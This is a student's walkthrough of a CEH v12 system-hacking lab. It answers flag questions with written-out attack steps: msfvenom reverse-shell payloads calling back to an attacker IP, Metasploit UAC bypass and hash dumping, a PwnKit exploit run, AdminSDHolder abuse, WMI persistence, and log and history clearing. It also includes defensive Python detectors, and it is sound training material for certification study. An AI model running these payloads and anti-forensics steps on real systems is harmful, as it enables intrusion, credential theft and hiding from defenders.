Module 06 - Practical

These are the steps I took to complete the flag-hunting session for the current module of the CEH v12 Practical course.

Flag 1

Run the Responder tool on the Ubuntu machine and find the NTLM hash for the user Jason on Windows 11. Simulate the user Jason (user: Jason and password: qwerty) on the Windows 11 machine. Enter the option that specifies the interface while running the Responder tool.

A: -I

Flag 2

Run L0phtCrack on the Windows 11 machine. You have the admin credentials (username: Administrator, password: Pa$$w0rd) of a target machine, which is at 10.10.1.22. Find the password of another user, Martin, on the machine at 10.10.1.22.

Launch L0phtCrack and follow these steps: Windows > A remote Machine > {Host: 10.10.1.22} {Username: Administrator} {Password: Pa$$w0rd} > Thorough Password Audit > Generate Report {CSV} > Run this job Immediately

A: apple

Flag 3

Search for the vulnerability "CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)" on exploit-db.com. What is the CVE ID for this vulnerability?

  • Browser: exploit-db.com

  • Browser: Search for > CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)

A: 2018-6892

Flag 4

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Run the Armitage tool from the attacker’s machine to exploit vulnerabilities on the target system. Interact with the target system and use the sysinfo command to find the build number of the target’s operating system.

Parrot Terminal
service postgresql start

Armitage needs the PostgreSQL database running, so start it first.

  • Execute Application > Pentesting > Exploitation Tools > Metasploit Framework > Armitage

When Armitage asks for the Metasploit server connection information, accept it and connect.

Armitage
Select meterpreter_reverse_tcp

Fill in the required fields of the exploit dialog and launch the exploit.

  • Open the target machine and execute the exploit

  • Armitage: Open the shell and execute sysinfo

A: 22000

Flag 5

Use the Ninja Jonin to gain access to the Windows Server 2022. Enter the name of the Windows Server machine that is captured in the Jonin console.

In the free trial version of Ninja&Jonin you have to change the HOST value in constants.json.

  • Open Jonin.win.exe with the attacker machine

  • Open Ninja.win.exe with the target

  • Now, with the attacker terminal, type List

This tool is excessively manual, so there is usually no point in using it.

A: Server22

Flag 6

Use the Ninja Jonin to gain access to the Windows Server 2022. Enter the command that should be used to open shell on the target machine, using Jonin console.

As the documentation shows (original image not reproduced here), the command to execute after connect 1 is cmd.

A: cmd

Flag 7

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Execute and exploit a vulnerable application, D:\CEH-Tools\CEHv11 Module 06 System Hacking\Buffer Overflow Tools\vulnserver\vulnserver.exe, to gain admin access to the target machine. Flag submission is not required for this task, enter "No flag" as the answer.

For this task you must follow the steps of Lab 1: Task 7; there are 150 steps in that task.

A: No flag

Flag 8

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Use the msfvenom tool on the attacker’s machine to exploit the target machine and gain SYSTEM-level access. Obtain the password hashes of the users on the target machine 10.10.1.11. Flag submission is not required for this task, enter "No flag" as the answer.

Using your Parrot Machine as root,

Parrot Terminal
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.1.13 -f exe > /home/attacker/Desktop/Exploit.exe

Create a sharing folder and copy the exploit there.

Parrot Terminal
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/

Now open the MSFconsole and change the variables.

Parrot Terminal
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
exploit -j -z

Open the Windows machine, log in, browse to "http://10.10.1.13/share", download the file "Exploit.exe" and execute it. [Remember to run service apache2 start on Parrot so the share is reachable from Windows.]

Now return to your Parrot machine: the handler reports a new session, which you interact with next.

Meterpreter
sessions -i 1
getuid

Here we use a tool provided by EC-Council. On your Parrot machine, first open smb://10.10.1.11 with the Windows credentials, then copy BeRoot (location: CEHv12 Module 06 System Hacking\Privilege Escalation Tools) to your desktop.

Meterpreter
upload /home/attacker/Desktop/BeRoot/beRoot.exe
shell
Windows Terminal (through the Meterpreter shell)
beRoot.exe
exit

Now we will go further with another tool.

Meterpreter
background                 # Send the session to the background before using the local exploit
use exploit/windows/local/bypassuac_fodhelper
show options
set SESSION 1
set payload windows/meterpreter/reverse_tcp
show options               # To check the information
set LHOST 10.10.1.13
set TARGET 0
exploit
getsystem -t 1
getuid                     # Confirm the new privilege level
run post/windows/gather/smart_hashdump

A: No flag

Flag 9

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Use the msfvenom tool on the attacker’s machine to create a backdoor and exploit the target machine to gain an MSF interactive shell. Find the number of interfaces on the target machine.

Same steps as before and the same exploit (this time called Backdoor.exe), but in the first msfconsole you use "set payload windows/meterpreter/reverse_tcp", and at the end you run the command ipconfig.

A: 2

Flag 10

Use a proof-of-concept code to execute the attack on the Parrot Security machine and escalate the privileges from a standard user to a root user. Flag submission is not required for this task, enter "No flag" as the answer.

Here we use a specific exploit, pkexec CVE-2021-4034.

Parrot Terminal
mkdir /tmp/pwnkit
# Place the CVE-2021-4034 proof-of-concept source under /tmp/pwnkit first
cd /tmp/pwnkit/CVE-2021-4034
make
./cve-2021-4034

And done, you exploited yourself. Jokes aside, it is a good tool if you manage to execute the exploit as a user inside a Linux machine.

A: No Flag

Flag 11

Exploit misconfigured NFS to gain access and to escalate privileges on the Ubuntu machine. Enter the command that was used to check if any share is available for mount on the Ubuntu machine.

This is a question from LAB 2 – task 4. After discovering port 2049 (nfs_acl) with Nmap and installing the client tools with sudo apt-get install nfs-common, you prepare a mount point for further use.

A: showmount -e 10.10.1.9

Flag 12

Exploit misconfigured NFS to gain access and to escalate privileges on the Ubuntu machine. What is the command that is used to view current processes along with their PIDs?

This is a question from LAB 2 – task 4. It is extremely important to know this command; it will help you a lot when solving machines.

A: ps -ef

Flag 13

Exploit the Sticky Keys feature to gain access and to escalate privileges on the Windows 11 machine. Enter the domain of Windows 11 obtained from the sysinfo command in the meterpreter session.

Same setup as the previous Meterpreter exploits. Since Meterpreter is used a lot from here on, I have put the common steps into a "Classic Meterpreter" block.

------ START OF CLASSIC METERPRETER -----

Parrot Terminal
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=444 -f exe > /home/attacker/Desktop/Exploit.exe

Create a sharing folder and copy the exploit there.

Parrot Terminal
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/
service apache2 start

Now open the MSFconsole and change the variables.

Parrot Terminal
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
run

Open the Windows machine, log in, browse to "http://10.10.1.13/share", download the file "Exploit.exe" and execute it. [Remember to run service apache2 start on Parrot so the share is reachable from Windows.]

------ END OF CLASSIC METERPRETER -----

Meterpreter
sysinfo

A: WORKGROUP

Flag 14

Use Metasploit inbuilt Mimikatz module which is also known as kiwi to dump Hashes from Windows 11 machine. Enter the command that is used to open mimikatz in meterpreter session.

Follow the steps from Classic Meterpreter - Flag 13, then:

Meterpreter
background                 # Send the session to the background before using the local exploit
use exploit/windows/local/bypassuac_fodhelper
set SESSION 1

Check which variables need to be filled with show options, for example set TARGET 0.

Meterpreter
exploit
getsystem -t 1
load kiwi

A: load kiwi

Flag 15

Use the Power Spy tool on the Windows Server 2022 machine to monitor the target machine at 10.10.1.19. Use the user account Jason, with the password qwerty, to establish a Remote Desktop Connection with the target system. What is the default key combination to put Power Spy in the Stealth mode?

From the LAB 3 – TASK 1, at the step 33.

I don't like this tool, so if someone wants to add steps here, it is open: send me an email and I will add the information here (remember to add your webpage or LinkedIn so I can give proper credit).

A: Ctrl+Alt+X

Flag 16

Use the Spytech SpyAgent tool on the Windows Server 2022 machine to monitor the target machine at 10.10.1.19. Use the user account Jason, with the password qwerty, to establish a Remote Desktop Connection with the target system. Which option will enable you to configure SpyTech Spy Agent to run in the total stealth mode, with all possible logging options preconfigured?

From the LAB 3 – TASK 2, at the step 23.

I don’t like this tool.

A: Complete + Stealth Configuration

Flag 17

In the Windows Server 2019 machine, use NTFS Streams to hide calc.exe inside the readme.txt file. Flag submission is not required for this task, enter "No flag" as the answer.

On your Windows machine, log in, go to the folder C:\magic, copy the file C:\Windows\System32\calc.exe there, and create a file called readme.txt with any content.

Windows Terminal
cd C:\magic
type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
mklink backdoor.exe readme.txt:calc.exe

A: No flag
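A defender-side check for the trick above, added here as an example and not part of the lab or these notes: parse the output of dir /r, which lists every alternate data stream of a file on its own line, and flag any stream that Windows does not write itself. The listing below is constructed for the example; the file names mirror the task.

```python
"""Find alternate data streams (ADS) in `dir /r` output.

`dir /r` prints each named stream as  file:stream:$DATA  on a line with a
size but no date column, which is what the regex keys on.
The listing is a constructed sample, not output from the lab machine.
"""
import re

STREAM_LINE = re.compile(r"^\s+([\d,]+)\s+(.+?):([^:\\/]+):\$DATA\s*$")

# Streams written by Windows itself (download mark-of-the-web); anything else deserves a look.
BENIGN_STREAMS = {"Zone.Identifier"}

DIR_R_OUTPUT = """\
 Volume in drive C has no label.
 Directory of C:\\magic

01/10/2024  10:00 AM    <DIR>          .
01/10/2024  10:00 AM    <DIR>          ..
01/10/2024  10:02 AM                12 readme.txt
                                27,648 readme.txt:calc.exe:$DATA
01/10/2024  10:03 AM             1,024 notes.docx
                                    26 notes.docx:Zone.Identifier:$DATA
               2 File(s)          1,036 bytes
"""


def parse_streams(listing):
    """Return [(file, stream, size_bytes)] for every named stream in the listing."""
    found = []
    for line in listing.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            found.append((m.group(2), m.group(3), size))
    return found


def suspicious_streams(listing, min_size=1024):
    """Streams that are not known-benign, or large enough to carry an executable."""
    return [s for s in parse_streams(listing)
            if s[1] not in BENIGN_STREAMS or s[2] >= min_size]


if __name__ == "__main__":
    for file, stream, size in suspicious_streams(DIR_R_OUTPUT):
        print(f"suspicious stream: {file}:{stream} ({size} bytes)")
```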

Flag 18

On the Windows 11 machine, hide data into a text file using the whitespace steganography tool Snow. Flag submission is not required for this task, enter "No flag" as the answer.

On your Windows machine, log in, go to the folder "E:\CEH-Tools\CEHv12 Module 06 System Hacking\Steganography Tools\Whitespace Steganography Tools" and copy the folder "Snow" to the Desktop. Then create a readme.txt with any content.

Windows Terminal
cd C:\Users\Admin\Desktop\Snow
snow -C -m "Real Sensitive Information" -p "magic" readme.txt readme2.txt

And done: readme2.txt now carries the hidden message. It shows the original content of readme.txt while hiding the sensitive information in whitespace. To reveal the hidden content, type: snow -C -p "magic" readme2.txt

A: No flag
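An added detection example, not from the lab or these notes: Snow leaves the visible text untouched and hides the payload in trailing spaces and tabs, so scanning a file for lines that end in a mix of both reveals a likely carrier, and stripping that whitespace neutralises it. The sample texts are constructed.

```python
"""Detect (and neutralise) whitespace steganography of the kind Snow produces.

Snow appends runs of spaces and tabs to line ends; ordinary editors rarely
leave a tab embedded in trailing spaces, so several such lines are a strong hint.
Both samples are constructed for this example, not real lab files.
"""
import re

TRAILING_WS = re.compile(r"[ \t]+$")

# Constructed cover text and a constructed carrier with appended whitespace.
CLEAN = "Meeting notes\nNothing to see here.\nRegards\n"
CARRIER = ("Meeting notes \t  \t\n"
           "Nothing to see here.   \t \t\n"
           "Regards\t\n")


def trailing_whitespace(text):
    """Return [(line_number, trailing_whitespace)] for lines that carry any."""
    hits = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = TRAILING_WS.search(line)
        if m:
            hits.append((n, m.group(0)))
    return hits


def snow_score(text):
    """Number of lines whose trailing whitespace mixes tabs and spaces."""
    return sum(1 for _, ws in trailing_whitespace(text) if "\t" in ws and " " in ws)


def looks_like_snow(text, min_mixed_lines=2):
    """Heuristic verdict: at least `min_mixed_lines` mixed-whitespace line endings."""
    return snow_score(text) >= min_mixed_lines


def strip_trailing_whitespace(text):
    """Remove the hidden channel while keeping the visible content."""
    return "\n".join(TRAILING_WS.sub("", ln) for ln in text.splitlines()) + "\n"


if __name__ == "__main__":
    for name, sample in (("clean", CLEAN), ("carrier", CARRIER)):
        print(f"{name}: {len(trailing_whitespace(sample))} lines with trailing whitespace, "
              f"{snow_score(sample)} mixed, suspicious={looks_like_snow(sample)}")
```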

Flag 19

On the Windows Server 2019 machine, hide text inside an image using the OpenStego tool. Flag submission is not required for this task, enter "No flag" as the answer.

  • Using the Windows Machine, execute OpenStego

  • At Message File, add a file with any message.

  • At Cover File, upload any image

  • At Output, add a path and the result name

A: No Flag

Flag 20

Exploit a misconfigured startup folder to gain privileged access and persistence on the Windows 11 machine. What is the command used in this task to elevate privileges?

This task is about using Metasploit + GhostPack Seatbelt, from Module 06, Lab 2, Task 1.

A: getsystem -t 1

Flag 21

Exploit Active Directory objects by adding Martin, a standard user on Windows Server 2022, to the Domain Admins group through AdminSDHolder. Enter the name of the user that is added to the Domain Admins group in this task.

Using your Parrot machine, create a malicious file with msfvenom.

------ START OF CLASSIC METERPRETER -----

Parrot Terminal
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Exploit.exe

Create a sharing folder and copy the exploit there.

Parrot Terminal
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/
service apache2 start

Now open the MSFconsole and change the variables.

Parrot Terminal
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
run

Open the Windows machine, log in, browse to "http://10.10.1.13/share", download the file "Exploit.exe" and execute it. [Remember to run service apache2 start on Parrot so the share is reachable from Windows.]

------ END OF CLASSIC METERPRETER -----

Meterpreter
getuid # Check information
upload -r /home/attacker/PowerTools-master C:\\Users\\Administrator\\Downloads
shell
cd C:\Windows\System32
powershell

With PowerShell running we can change the directory object; in this case we grant Martin rights on AdminSDHolder.

Windows Terminal (PowerShell through the Meterpreter shell)
cd C:\Users\Administrator\Downloads\PowerView
Import-Module ./powerview.psm1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName Martin -Verbose -Rights All
Get-ObjectAcl -SamAccountName "Martin" -ResolveGUIDs

In this case the right granted to Martin is just GenericAll.

A: Martin

Flag 22

Exploit WMI event subscription to gain persistent access to the Windows 11 machine. Enter the server username that is acquired after exploiting the WMI event subscription.

Using your Parrot machine, create two malicious files with msfvenom.

------ START OF CLASSIC METERPRETER -----

Parrot Terminal
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Payload.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/wmi.exe

Create a sharing folder and copy the exploit there.

Parrot Terminal
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Payload.exe /var/www/html/share/
cp /home/attacker/Desktop/wmi.exe /var/www/html/share/
service apache2 start

Now open the MSFconsole and change the variables.

Parrot Terminal
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
run

Open the Windows machine, log in, browse to "http://10.10.1.13/share", download the files you copied to the share (Payload.exe and wmi.exe) and execute Payload.exe. [Remember to run service apache2 start on Parrot so the share is reachable from Windows.]

------ END OF CLASSIC METERPRETER -----

Meterpreter
getuid
upload -r /home/attacker/Wmi-Persistence-master C:\\Users\\Administrator\\Downloads
load powershell
powershell_shell
Import-Module ./WMI-Persistence.ps1
Install-Persistence -Trigger Startup -Payload "C:\Users\Administrator\Downloads\wmi.exe"

Now open a new Parrot terminal and start a second handler for the persistence payload.

Parrot Terminal
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
exploit

From the last command, you get the answer.

A: NT AUTHORITY\SYSTEM

Flag 23

From the Parrot Security machine, navigate to CEHv12 Module 06 System Hacking\Covering Tracks Tools\Covert_TCP on the machine at 10.10.1.11 and copy the file covert_tcp.c. Compile the code in covert_tcp.c to create a covert TCP channel between the Parrot Security machine (10.10.1.13) and the Ubuntu machine at 10.10.1.9. For the Windows 11 machine, the username is Admin, and the password is Pa$$w0rd. Flag submission is not required for this task, enter "No flag" as the answer.

This program is used to send a message through TCP; you can read it with Wireshark. I don't find this useful.

A: No flag

Flag 24

On the Windows 11 machine, use Auditpol to enable or disable security auditing on local or remote systems and to adjust the audit criteria for different categories of security events. Which command is used to clear the audit policies?

Auditpol.exe is the command-line utility tool to change the Audit Security settings at the category and sub-category levels. You can use Auditpol to enable or disable security auditing on local or remote systems and to adjust the audit criteria for different categories of security events.

In the second module, lab 4, task 1, they use auditpol /clear /y to clear the audit policies

A: auditpol /clear /y

Flag 25

In the Windows 11 machine, use various Windows utilities such as Clear_Event_Viewer_Logs.bat, wevtutil, and Cipher to clear system logs. Which wevtutil command will clear all system logs (enter the complete command as the answer)?

The system log file contains events that are logged by the OS components. These events are often predetermined by the OS itself. System log files may contain information about device changes, device drivers, system changes, events, operations, and other changes.

There are various Windows utilities that can be used to clear system logs such as Clear_Event_Viewer_Logs.bat, wevtutil, and Cipher. Here, we will use these utilities to clear the Windows machine logs.

This is a theoretical question from Module 06 - Lab 4 - Task 2 about the command used on the Windows machine to clear the system log.

A: wevtutil cl system
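From the defender's side, the auditpol and wevtutil steps of Flags 24 and 25 each leave their own trace: 4719 (audit policy changed), 104 (System log cleared) and 1102 (Security log cleared). This added example, not from the lab or these notes, scans constructed event records (assumed to have been forwarded off the host, so they survive the clearing) and correlates a policy change followed by a log clear from the same account.

```python
"""Flag log-clearing and audit-policy tampering in Windows event records.

The records are constructed JSON lines resembling forwarded events; the
field names (EventID, Channel, Computer, Account, Time) are this example's own.
"""
import json

# Event IDs written by the actions the lab performs.
ANTIFORENSIC_EVENTS = {
    4719: "System audit policy changed",        # auditpol /clear and similar
    104:  "Event log cleared (System log)",     # wevtutil cl system
    1102: "Audit (Security) log cleared",       # wevtutil cl security
}

SAMPLE_EVENTS = """\
{"EventID": 4624, "Channel": "Security", "Computer": "WIN11", "Account": "Admin", "Time": "2024-01-10T10:01:00"}
{"EventID": 4719, "Channel": "Security", "Computer": "WIN11", "Account": "Admin", "Time": "2024-01-10T10:05:12"}
{"EventID": 104, "Channel": "System", "Computer": "WIN11", "Account": "Admin", "Time": "2024-01-10T10:06:40"}
{"EventID": 1102, "Channel": "Security", "Computer": "WIN11", "Account": "Admin", "Time": "2024-01-10T10:06:41"}
{"EventID": 7036, "Channel": "System", "Computer": "WIN11", "Account": "SYSTEM", "Time": "2024-01-10T10:07:00"}
"""


def parse_events(jsonl):
    """Parse JSON-lines export into a list of event dicts (blank lines skipped)."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def find_antiforensics(events):
    """Return one alert dict per event whose ID is in ANTIFORENSIC_EVENTS."""
    alerts = []
    for ev in events:
        what = ANTIFORENSIC_EVENTS.get(ev.get("EventID"))
        if what:
            alerts.append({"time": ev["Time"], "host": ev["Computer"],
                           "account": ev["Account"], "event_id": ev["EventID"],
                           "what": what})
    return alerts


def clearing_after_policy_change(alerts):
    """True when an account clears a log after having changed the audit policy."""
    changed = set()
    for a in sorted(alerts, key=lambda a: a["time"]):
        if a["event_id"] == 4719:
            changed.add(a["account"])
        elif a["event_id"] in (104, 1102) and a["account"] in changed:
            return True
    return False


if __name__ == "__main__":
    alerts = find_antiforensics(parse_events(SAMPLE_EVENTS))
    for a in alerts:
        print(f"{a['time']} {a['host']} {a['account']}: {a['event_id']} {a['what']}")
    print("policy change followed by log clear:", clearing_after_policy_change(alerts))
```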

Flag 26

In the Parrot Security machine, clear the Linux machine event logs using the Bash shell. Which command will disable the Bash shell from saving the history?

The same as the previous question, but on Linux. Here it is a lot easier to complete the task: you can set the history size to zero so that saved commands are removed and further ones are not kept.

You can also run history -c to clear the history already held in memory.

A: export HISTSIZE=0

Flag 27

Use various commands to hide file in Windows and Linux machines. Enter the name of the user that is added in Windows 11 machine in this task.

Here they use many generic commands; it is not worth learning much about them.

In Windows, you hide a folder by changing the attributes.

Windows Terminal
attrib +h +s +r Test
rem To remove the attributes again:
attrib -h -s -r Test

rem You can do something similar with net user.
net user Test /active:yes
rem To disable the account again:
net user Test /active:no

A: Test

Flag 28

Use various commands to hide file in Windows and Linux machines. Enter the name of the text file that is hidden in Parrot Security machine in this task.

Just add a dot at the beginning of the file.

Parrot Terminal
touch .Secret.txt

A: Secret.txt

Flag 29

In the Windows 11 machine, use the CCleaner tool located at E:\CEH-Tools\CEHv12 Module 06 System Hacking\Covering Tracks Tools\CCleaner to remove unused files and traces of Internet browsing details. Flag submission is not required for this task, enter "No flag" as the answer.

Ok, this is just executing CCleaner, there is no mystery here.

A: No flag
